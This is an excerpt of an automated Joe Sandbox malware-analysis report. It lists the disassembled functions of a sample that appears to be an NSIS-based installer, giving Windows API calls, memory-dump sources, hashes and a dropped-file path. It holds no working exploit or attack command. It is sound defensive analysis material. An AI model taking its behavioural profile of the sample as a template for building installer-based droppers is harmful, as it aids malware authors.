                                                                                                                                                                            • Opcode Fuzzy Hash: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                            • Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619
                                                                                                                                                                            Function 00404463 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040447D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 281422827-0
                                                                                                                                                                            • Opcode ID: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
                                                                                                                                                                            • Instruction ID: a894ff31b73895be19cc099c8c24ae83fb845b4aca8af963ae3db1ea54c4578e
                                                                                                                                                                            • Opcode Fuzzy Hash: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
                                                                                                                                                                            • Instruction Fuzzy Hash: F6C08C31048200BFD281A704CC42F1FF3E8EF9031AF00C42EB15CE00D1C63494208A26
                                                                                                                                                                            Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                            • Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
                                                                                                                                                                            • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                            • Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
                                                                                                                                                                            Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                            • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                            • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                                                                                                                                            Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                            Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                            • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                            • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                                                                                                                                            • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                                                                                                                                            Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                              • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                                                                                                                                                                              • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                              • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                                                                                                                                                              • Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2
                                                                                                                                                                              • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2972824698-0
                                                                                                                                                                            • Opcode ID: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
                                                                                                                                                                            • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 00404954 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049A3
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                                                                                                                                                                            • lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
                                                                                                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
                                                                                                                                                                              • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
                                                                                                                                                                              • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                                                                                                                                              • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                                                                                                                                              • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                                                                                                                                              • Part of subcall function 0040678E: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                                                                                                                                                                              • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                              • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                              • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
                                                                                                                                                                            • API String ID: 2624150263-3699076126
                                                                                                                                                                            • Opcode ID: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                                                                                                                                                                            • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                                                                                                                                                                            • Opcode Fuzzy Hash: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                                                                                                                                                                            • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                                            Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner, xrefs: 00402269
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
                                                                                                                                                                            • API String ID: 542301482-2682599531
                                                                                                                                                                            • Opcode ID: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
                                                                                                                                                                            • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                                                                                                                                                                            • Opcode Fuzzy Hash: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
                                                                                                                                                                            • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                                                                                                                                                                            Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                            • Opcode ID: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
                                                                                                                                                                            • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
                                                                                                                                                                            • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                                                                                                                                                                            Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404EE8
                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404EF3
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                                                                                                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404FCA
                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                                                                                                                                                                              • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
